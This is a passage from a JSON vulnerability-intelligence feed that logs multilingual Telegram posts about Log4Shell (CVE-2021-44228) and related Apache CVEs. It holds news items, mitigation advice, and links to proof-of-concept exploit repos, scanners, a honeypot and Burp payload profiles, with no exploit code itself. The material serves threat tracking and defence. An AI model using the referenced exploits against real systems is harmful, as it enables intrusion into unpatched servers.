\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c log4j2.formatMsgNoLookups \u0432 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 true.\n\n\u0422\u0430\u043a\u0436\u0435 LunaSec \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043a\u0438\u0442\u0430\u0439\u0446\u0435\u0432 \u0433\u043e\u0432\u043e\u0440\u044f\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 JDK \u0432\u044b\u0448\u0435 6u211, 7u201, 8u191 \u0438 11.0.1.\n\n\u041d\u0443 \u0430 \u0432\u0438\u0448\u0435\u043d\u043a\u0430 \u043d\u0430 \u044d\u0442\u043e\u043c \u0440\u043e\u0436\u0434\u0435\u0441\u0442\u0432\u0435\u043d\u0441\u043a\u043e\u043c \u0442\u043e\u0440\u0442\u0435 - \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Minecraft \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 1.8.8. \n\nApache Foundation \u043f\u044c\u044e\u0442 \u0432\u0430\u043b\u0435\u0440\u044c\u044f\u043d\u043a\u0443 \u0438 \u043c\u043e\u043b\u0447\u0430\u0442.\n\nMerry Christmas, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-10T09:44:22.000000Z"}, {"uuid": "07f6339f-5fe6-4ef6-903a-6360bbd28190", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/OpenPcOfficials/87", "content": "https://github.com/jas502n/Log4j2-CVE-2021-44228?s=08", "creation_timestamp": "2021-12-12T20:01:30.000000Z"}, {"uuid": "0f487099-4219-4cd5-a57e-a7fa027b6f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/OpenPcOfficials/83", "content": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce", "creation_timestamp": "2021-12-12T07:55:06.000000Z"}, {"uuid": "3f6914da-d96d-4d19-8c6d-4e808bffaa8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/OpenPcOfficials/81", "content": "https://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228", "creation_timestamp": "2021-12-12T07:52:03.000000Z"}, {"uuid": "6810fb97-d3b1-4514-ba25-cc5ccc2c2c5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/poxek/277", "content": "Log4j2 CVE-2021-44228 revshell \u2014 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043d\u0430 Ubuntu 18.04\n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a \n\n@dnevnik_infosec", "creation_timestamp": "2021-12-18T15:44:22.000000Z"}, {"uuid": "526fd029-dbc5-4d97-b0fb-63c08b091546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44224", "type": "seen", "source": "https://t.me/poxek/322", "content": "#news \u0423\u0441\u0442\u0430\u043b\u0438 \u0443\u0436\u0435 \u0441\u043b\u0443\u0448\u0430\u0442\u044c \u043f\u0440\u043e Log4j, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0434\u043e\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u0438\u0437 \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0443\u0442\u044e\u0433\u0430? \u041f\u043e\u043d\u0438\u043c\u0430\u044e. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u043e\u0442 \u0432\u0430\u043c \u0435\u0449\u0451 \u0434\u0432\u0435 \u043d\u043e\u0432\u0435\u043d\u044c\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0432 Apache HTTPD: CVE-2021-44790 \u0438 CVE-2021-44224.\n\n\u0427\u0442\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e: \n\u22c5 CVE-2021-44790 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430, CVE-2021-44224 \u2014 \u0441 \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f;\n\u22c5 \u0423\u044f\u0437\u0432\u0438\u043c\u044b \u0432\u0435\u0440\u0441\u0438\u0438 2.4.51 \u0438 \u0441\u0442\u0430\u0440\u0448\u0435;\n\u22c5 \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c;\n\u22c5 \u041e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u044d\u0442\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e \u0441\u0442\u043e\u0438\u0442 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0442 RCE \u0438 DoS-\u0430\u0442\u0430\u043a\u0430\u043c\u0438.\n\nHTTPD, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u043f\u043e \u0441\u0432\u043e\u0435\u0439 \u0432\u0435\u0437\u0434\u0435\u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0438 \u043d\u0435 \u0441\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0443\u043f\u0430\u0435\u0442 Log4j, \u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0440\u0435\u043a\u0430\u044e\u0442 \u043d\u043e\u0432\u0443\u044e \u0440\u0430\u0434\u043e\u0441\u0442\u043d\u0443\u044e \u0432\u043e\u043b\u043d\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0443\u0436\u0435 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0412\u0435\u0441\u0451\u043b\u044b\u0439 \u043a\u043e\u043d\u0435\u0446 \u0433\u043e\u0434\u0430 \u0432\u044b\u0434\u0430\u043b\u0441\u044f.\n\n@tomhunter", "creation_timestamp": "2021-12-23T17:49:44.000000Z"}, {"uuid": "e4d1087a-5490-4153-a09d-826772b3f469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/package_security/17", "content": "\u200b\ud83c\udfc6 \u0418\u0442\u043e\u0433\u0438 \u0433\u043e\u0434\u0430\n\n\u041d\u0430\u0441\u0442\u0430\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0435.\n2\u043a22 \u0433\u043e\u0434 \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043a \u043a\u043e\u043d\u0446\u0443, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0430 \u043f\u043e\u0434\u0432\u043e\u0434\u0438\u0442\u044c \u0438\u0442\u043e\u0433\u0438.\n\n\u0423 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u043e\u0432, \u043a\u0430\u043a \u0438 \u0432\u0441\u0435\u0433\u0434\u0430, \u0438\u0442\u043e\u0433\u0438 \u0441\u0432\u043e\u0438. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0422\u041e\u041f-10 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 2022 \u0433\u043e\u0434\u0443 \u043f\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Cyber Threat Intelligence:\n\n1. Follina (CVE-2022-30190) \n\n2. Log4Shell (CVE-2021-44228) \n\n3. Spring4Shell (CVE-2022-22965) \n\n4. F5 BIG-IP (CVE-2022-1388) \n\n5. Google Chrome zero-day (CVE-2022-0609) \n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882) \n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040) \n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352) \n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134) \n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b, \u0431\u0435\u0440\u0435\u0433\u0438\u0442\u0435 \u0441\u0435\u0431\u044f \u0438 \u0432\u0430\u0448\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u044b.\nP.S. \u041d\u0438\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0438\u043a\u0447\u0430 \u0441 \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u043c\u0438 \u0438\u043a\u043e\u043d\u043a\u0430\u043c\u0438\n\n#\u041f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\n\u041f\u0430\u043a\u0435\u0442 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438", "creation_timestamp": "2022-12-16T15:56:36.000000Z"}, {"uuid": "3c7a9850-f360-454e-b06c-1a9aa52499e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/NelR4pOf0hiiYvJpjXm4VQZR13llMulm0_w10sYH3GlUSrA", "content": "", "creation_timestamp": "2025-07-11T03:00:05.000000Z"}, {"uuid": "9c722605-8dfd-47b5-88d2-73ef1da321bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/924", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMinecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam\nURL\uff1ahttps://github.com/Adikso/minecraft-log4j-honeypot", "creation_timestamp": "2021-12-11T03:19:00.000000Z"}, {"uuid": "249a42fa-887d-4405-bf9a-2ab7666c40fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1080", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228\nURL\uff1ahttps://github.com/bhprin/log4j-vul", "creation_timestamp": "2021-12-15T05:20:39.000000Z"}, {"uuid": "8d91e734-9cac-42a9-ace1-4e7b124862fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1107", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLocal Bytecode Scanner for Log4JShell Vulnerability (CVE-2021-44228)\nURL\uff1ahttps://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector", "creation_timestamp": "2021-12-16T12:08:57.000000Z"}, {"uuid": "8bcb7af3-0950-48f4-947a-d1a7ecb4365a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1118", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aScanner local em Python para varredura e localiza\u00e7\u00e3o de vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco, contemplando an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\nURL\uff1ahttps://github.com/andalik/log4j-filescan", "creation_timestamp": "2021-12-16T16:02:49.000000Z"}, {"uuid": "c4c7dd90-b96b-464b-9f19-041649f90359", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1174", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI\nURL\uff1ahttps://github.com/Labout/log4shell-rmi-poc", "creation_timestamp": "2021-12-19T17:57:23.000000Z"}, {"uuid": "0d79d996-42cd-45d2-b4e8-b21979a20f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cyberbannews_ir/4671", "content": "\ud83d\uded1\u0647\u0634\u062f\u0627\u0631 \u0633\u0627\u0632\u0645\u0627\u0646 \u0645\u0644\u06cc \u0628\u0631\u06cc\u062a\u0627\u0646\u06cc\u0627 \u062f\u0631\u0628\u0627\u0631\u0647 \u062a\u0647\u062f\u06cc\u062f \u062c\u062f\u06cc \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\n\n\u0645\u0631\u06a9\u0632 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc \u0645\u0644\u06cc (NCSC) \u0628\u0631\u06cc\u062a\u0627\u0646\u06cc\u0627 \u062f\u0631 \u0645\u0648\u0631\u062f \u06cc\u06a9 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u062f\u0631 \u06a9\u062f \u062c\u0627\u0648\u0627 \u0628\u0627 \u0627\u062d\u062a\u0645\u0627\u0644 \u062e\u0637\u0631 \u062c\u062f\u06cc \u0628\u0631\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a \u0648 \u06cc\u06a9\u067e\u0627\u0631\u0686\u06af\u06cc \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0628\u0647 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627 \u0647\u0634\u062f\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f.\n\n\u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0647 \u0646\u0627\u0645 \u00abCVE-2021-44228\u00bb \u062f\u0631 \u00abapache log4j\u00bb \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a\u061b \u0627\u06cc\u0646 \u06cc\u06a9 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u0648\u0631\u0648\u062f\u06cc \u062c\u0627\u0648\u0627 \u0645\u0646\u0628\u0639 \u0628\u0627\u0632 \u0627\u0633\u062a \u06a9\u0647 \u0627\u0632 \u0633\u0648\u06cc \u0628\u0633\u06cc\u0627\u0631\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0648 \u062e\u062f\u0645\u0627\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\n\n#\u0646\u0642\u0636_\u0627\u0645\u0646\u06cc\u062a\u06cc\n\n\u2705 \u0628\u06cc\u0634\u062a\u0631 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f:\nhttps://bit.ly/3oNOvyh\n\n@cyberbannews_ir", "creation_timestamp": "2021-12-14T03:02:09.000000Z"}, {"uuid": "7e41b804-10f5-4781-8736-0541846fede8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/alexmakus/4455", "content": "\u041a\u0430\u043a \u043a\u043e\u0433\u0434\u0430-\u0442\u043e \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u0430\u0445, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 log4j \u043f\u043e\u0440\u0430, \u043a\u0430\u0436\u0435\u0442\u0441\u044f, \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0430 \u0435\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0435 \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442\u044b \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439, \u0438\u043d\u0430\u0447\u0435 \u043f\u043e\u0442\u043e\u043a \u0431\u0443\u0434\u0435\u0442 \u0441\u043e\u0441\u0442\u043e\u044f\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437 \u0430\u043f\u0434\u0435\u0439\u0442\u043e\u0432 \u043d\u0430 \u0442\u0435\u043c\u0443 log4j. \u041d\u0443, \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c. \u041f\u043e\u043a\u0430 \u0447\u0442\u043e \u0442\u0443\u0442 \u0432\u043e\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435: Microsoft \u0443\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043f\u0430\u043b\u044c\u0446\u0430\u043c\u0438 \u043d\u0430 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u0441\u0442\u0440\u0430\u043d\u044b \u043e\u0441\u0438 \u0434\u043e\u0431\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-44228 \u043d\u0430\u0432\u0435\u0440\u043d\u044f\u043a\u0430 \u0441 \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 (\u0434\u043b\u044f \u0441\u0435\u0431\u044f \u0446\u0435\u043b\u044c\u044e)\n\nhttps://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/\n\n\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0430\u044f CISA \u0432 \u043f\u0440\u0438\u043a\u0430\u0437\u043d\u043e\u043c \u043f\u043e\u0440\u044f\u0434\u043a\u0435 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u0441\u0435 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u043e 24 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041f\u0440\u0438\u043a\u0430\u0437\u044b, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u0443\u0441\u043a\u043e\u0440\u044f\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441.\n\nhttps://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance", "creation_timestamp": "2021-12-17T05:01:04.000000Z"}, {"uuid": "c2267283-afff-4ea2-8864-3abbd2a67422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/alexmakus/4433", "content": "\u041a\u043e\u043b\u043b\u0435\u043a\u0446\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e log4j\n\n- Overview by @LunaSecIO: https://www.lunasec.io/docs/blog/log4j-zero-day/\n\n- Vulnerable Hashes by @mubix: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes\n\n- IP\u2019s Exploiting by @GreyNoiseIO: https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217\n\n- Detection Rules by @cyb3rops: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n\n(\u041e\u0442\u0441\u044e\u0434\u0430 https://twitter.com/FrankMcG/status/1469375212160438275)", "creation_timestamp": "2021-12-11T12:47:22.000000Z"}, {"uuid": "1d32615d-53f0-4ad6-a55c-6d6adad34914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/alexmakus/4430", "content": "\u0427\u0438\u0442\u0430\u0442\u0435\u043b\u044c \u043f\u0440\u0438\u0441\u043b\u0430\u043b \u0441\u0441\u044b\u043b\u043e\u0447\u043a\u0443 \u043f\u0440\u043e \u043d\u043e\u0432\u0443\u044e zero-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0435\u043a\u0442\u0435 Apache Log4j2 \u2014\u00a0\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u043b\u043e\u0433\u043e\u0432, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u043c \u043d\u0430 Java. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0440\u0430\u0437\u0443 \u043c\u0430\u0441\u0441\u0443 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u043a\u0430\u043a Apache Struts2, Apache Solr, Apache Druid, Apache Flink \u0438 \u0434\u0440\u0443\u0433\u0438\u0435. \u041f\u0430\u0442\u0447 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c, \u043d\u043e, \u0432\u0438\u0434\u0438\u043c\u043e, \u043f\u043e\u043a\u0430 \u0432\u044b\u0439\u0434\u0443\u0442 \u0430\u043f\u0434\u0435\u0439\u0442\u044b \u0434\u043b\u044f \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u2014\u00a0\u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043d\u044f\u0442\u044c \u043a\u0430\u043a\u043e\u0435\u0442\u043e \u0432\u0440\u0435\u043c\u044f, \u0438 \u043d\u0430\u0434\u043e \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043b\u0435\u0434\u0438\u0442\u044c. proof of concept \u0434\u043b\u044f \u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c, \u0442\u0430\u043a \u0447\u0442\u043e \u0440\u0438\u0441\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043f\u043e\u043b\u043d\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\n\nhttps://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html", "creation_timestamp": "2021-12-10T13:19:05.000000Z"}, {"uuid": "26197203-2c17-480f-9b37-f61175025431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/HackingPublicoficial/317", "content": "RT @BurpBounty: Burp Bounty Pro and Burp Bounty Free CVE-2021-44228 Log4j RCE profile available! (new payloads added) If your are a Burp Bounty Pro user, download now the profile at: https://t.co/Li8mbdRw2V For Burp Bounty Free users you can download at: https://t.co/eSlsApypXt #log4j\n\u2014 DragonJAR - Seguridad Inform\u00e1tica (@DragonJAR) Dec 13, 2021", "creation_timestamp": "2021-12-13T21:26:15.000000Z"}, {"uuid": "63bd64a0-65d5-4be4-b29a-4192081519c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/HackingPublicoficial/394", "content": "Security Advisory: log4j 0-day Remote Code Execution Vulnerability (CVE-2021-44228)\n\nhttps://malware.news/t/security-advisory-log4j-0-day-remote-code-execution-vulnerability-cve-2021-44228/55399", "creation_timestamp": "2021-12-14T00:28:30.000000Z"}, {"uuid": "660a9bc8-dcf5-4736-ad04-c3de0a12f41b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/HackingPublicoficial/302", "content": "RT @elhackernet: Log4j2 RCE Passive Scanner plugin para BurpSuite para vulnerabilidad #log4shell - Ejecuci\u00f3n remota de c\u00f3digo (RCE) sin autenticaci\u00f3n CVE-2021-44228 https://t.co/FFtfYcP6vM https://t.co/LjkrtSxcJv\n\u2014 DragonJAR - Seguridad Inform\u00e1tica (@DragonJAR) Dec 11, 2021", "creation_timestamp": "2021-12-13T21:26:15.000000Z"}, {"uuid": "7645554f-4780-4608-80d1-c14152bd3a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/HackingPublicoficial/299", "content": "RT @BurpBounty: CVE-2021-44228 Log4j RCE Burp Bounty Pro Profile Available! Log4j versions prior to 2.15.0 are subject to a 